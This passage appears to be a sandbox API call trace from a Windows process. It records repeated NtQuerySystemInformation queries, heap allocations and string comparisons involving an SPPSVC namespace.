(SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0273.819] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc80, Length=0x28, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0273.830] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x50, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc80, Length=0x28, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x28, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbe0, Length=0x20, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x38, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x20, ResultLength=0x0) [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] GetProcessHeap () returned 0x2026c630000 [0273.840] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d6612b0 [0273.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.908] GetProcessHeap () returned 0x2026c630000 [0273.908] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d660f80 [0273.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.909] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.919] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.924] NtQuerySystemInformation 